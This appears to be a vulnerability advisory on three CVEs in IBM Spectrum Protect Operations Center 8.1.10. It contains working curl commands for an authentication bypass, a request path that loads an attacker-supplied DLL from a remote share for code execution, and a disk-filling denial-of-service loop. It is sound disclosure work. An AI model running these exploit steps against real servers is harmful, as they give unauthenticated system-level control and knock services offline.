IBM Spectrum Protect Operations Center 8.1.10 Multiple Vulnerabilities

CVE-2020-4954: Authentication Bypass

CVSSv3 Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)

CVSSv3 Base Score: 6.5

After installation the Operations Center needs to configure a Spectrum Protect server as its hub server through its web UI. During configuration, the hub server's IP:port and administrative credentials are used to access the hub server. After the Operations Center has associated with a hub server, a user can login to the Operations Center using the administrative credentials stored in the hub server.

An unauthenticated remote attacker can still login to the Operations Center that has already configured a hub server via URL endpoint /oc/configuration. The attacker sets up his/her own Spectrum Protect server and supplies his/her own IP:port and credentials in the configuration page. This allows the attacker to obtain an authenticated session with the Operations Center.

After logging in, it appears that the attacker cannot perform operations that require access to the configured hub server because the login session has attacker's credentials, which would not match the credentials configured for the hub server. However, s/he can perform other authenticated operations that don't require hub server access. For example, the attacker can enable logging for various components in OpsCntrLog.config and view the log contents by making RPC calls to com.ibm.tsm.gui.rpc.handlers.DebugRPC.

The following steps are used to get an authenticated session with the Operations Center:

a) Fetch a login JSESSIONID and xtoken (for XSRF protection)

curl -kis --tlsv1.2  'https://<spoc_host>:11090/oc/configuration' | egrep 'JSESSIONID|xtoken' 
Set-Cookie: JSESSIONID=0000HTCQksYD8Jr60DyZAj15mXa:50e18252-bcbc-4523-aa0b-79391fe7cec3; Path=/oc; Secure; HttpOnly
        <input type="hidden" name="xtoken" id="xtoken" value=EEEEFFED-645A-4514-955C-C336EF236403></input>

b) Login to Operations Center using credentials on attacker-controlled Spectrum Protect server; 302 = success

curl -kis --tlsv1.2 --cookie 'JSESSIONID=0000HTCQksYD8Jr60DyZAj15mXa:50e18252-bcbc-4523-aa0b-79391fe7cec3' -H 'Host: <spoc_host>:11090' -H 'Origin: https://<spoc_host>:11090' -d 'connectto=<attacker_controlled_server>%3A1500&login=<attacker_login>&password=<attacker_passwd>&useSSL=true&useTLS12Only=true&tzoffset=300&nextURL=&xtoken=EEEEFFED-645A-4514-955C-C336EF236403' -D - -o /dev/null 'https://<spoc_host>:11090/oc/configuration'
HTTP/1.1 302 Found
X-FRAME-OPTIONS: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval'; connect-src wss: https:; img-src 'self' data: *; font-src 'self' data:; report-uri csp-report
Strict-Transport-Security: max-age=31536000; includeSubDomains
Location: https://<spoc_host>:11090/oc/gui#configure

CVE-2020-4955: QueryReadStoreCache Authenticated RCE

CVSSv3 Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

CVSSv3 Base Score: 8.8

An authenticated remote attacker can send a specially crafted HTTP POST message to /oc/QueryReadStoreCache/ to load an attacker-controlled library file (i.e., DLL) into the Operations Center process, leading to remote code execution.

The following snippet shows the vulnerability:

    protected void handlePost(final HttpServletRequest req, final HttpServletResponse resp) throws ServletException, IOException {
        QueryReadStoreCache.log.logInfo("Url " + req.getRequestURI());
        final String[] url = req.getRequestURI().split("/");
        if (url.length < 5) {
            throw new IllegalStateException("The service requires at least 4 paths within the url");
        }
        try {
            final Map params = req.getParameterMap();
            final String serverName = req.getParameter("server");
            final Class<?> classInstance = Class.forName(url[3]);
            final Method method = classInstance.getMethod(url[4], (Class<?>[])QueryReadStoreCache.CLASS_ARGUMENT);
            final JSONArray list = JSONUtils.getFirstItemsArray(((JSONString)method.invoke(null, serverName)).toString());
[...]

The POST handler extracts a Java class (url[3]) and a method name for that class (url[4]) from the URL and invokes the method. The method should be a static method that takes a single parameter, which is supplied by the 'server' URL parameter. If the attacker sends a POST message to URL /oc/QueryReadStoreCache/java.lang.System/load with the 'server' parameter set to '\\\some_share\evil.dll', the attacker-controlled evil DLL gets loaded into the Operations Center process, leading to RCE.

When used in conjunction with vulnerability 1), the attacker can achieve unauthenticated RCE under the security context of the account running the Operations Center (i.e., the SYSTEM account on Windows).

CVE-2020-4956: DebugRPC Authenticated Remote DoS

CVSSv3 Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H)

CVSSv3 Base Score: 7.1

An authenticated attacker can issue a 'setCacheValue' RPC call to set a large cache value in the Operations Center cache and then repeatedly issue a 'dumpCache' RPC call to create a large number of large cache dump files on the Operations Center host. This can fill up the file system where the cache dump files reside, leading to DoS.

When used in conjunction with vulnerability 1), the attacker can achieve unauthenticated Remote DoS.

Here are the steps to create the cache dump files:

a) From vulnerability 1), an authenticated JSESSIONID and a xtoken are obtained.

b) Now that we have an authenticated JSESSIONID with Operations Center, we can create a large CacheValue in the SPOC cache

echo -en '{"clazz":"com.ibm.evo.rpc.RPCRequest","methodClazz":"com.ibm.tsm.gui.rpc.handlers.DebugRPC","methodName":"setCacheValue","methodArgs":["KEY1","'$(python3 -c "print('A'*10000000)")'"]}' > /tmp/cacheValue1

curl -kis --tlsv1.2 --cookie 'JSESSIONID=0000HTCQksYD8Jr60DyZAj15mXa:50e18252-bcbc-4523-aa0b-79391fe7cec3' -H 'Host: <spoc_host>:11090' -H 'Origin: https://<spoc_host>:11090' -H 'xtoken: EEEEFFED-645A-4514-955C-C336EF236403' -H 'Content-Type: application/json-rpc' -d @/tmp/cacheValue1 --compress 'https://<spoc_host>:11090/oc/RPCAdapter'

c) Repeatedly dump the cache

while true; do curl -kis --tlsv1.2 --cookie 'JSESSIONID=0000HTCQksYD8Jr60DyZAj15mXa:50e18252-bcbc-4523-aa0b-79391fe7cec3' -H 'Host: <spoc_host>:11090' -H 'Origin: https://<spoc_host>:11090' -H 'xtoken: EEEEFFED-645A-4514-955C-C336EF236403' -H 'Content-Type: application/json-rpc' -d '{"clazz":"com.ibm.evo.rpc.RPCRequest","methodClazz":"com.ibm.tsm.gui.rpc.handlers.DebugRPC","methodName":"dumpCache","methodArgs":[]}' --compress 'https://<spoc_host>:11090/oc/RPCAdapter'; done

For each dump, a different dump file is created in a temp folder. The attacker can control the size of the dump file by creating one or multiple CacheValues with a size of his/her own choosing. This can fill up the file system, leading to DoS.

C:\Windows\System32\config\systemprofile\AppData\Local\Temp>dir | more
 Volume in drive C has no label.
 Volume Serial Number is 1A68-87EC

 Directory of C:\Windows\System32\config\systemprofile\AppData\Local\Temp

11/13/2020  12:18 AM    <DIR>          .
11/13/2020  12:18 AM    <DIR>          ..
11/13/2020  12:14 AM        10,107,457 cachedump1005002470733379056.txt
11/13/2020  12:14 AM        10,107,457 cachedump1005272695032173425.txt
11/13/2020  12:15 AM        10,107,457 cachedump1011400486671420073.txt
11/13/2020  12:12 AM        10,107,457 cachedump101157961566663795.txt
[...]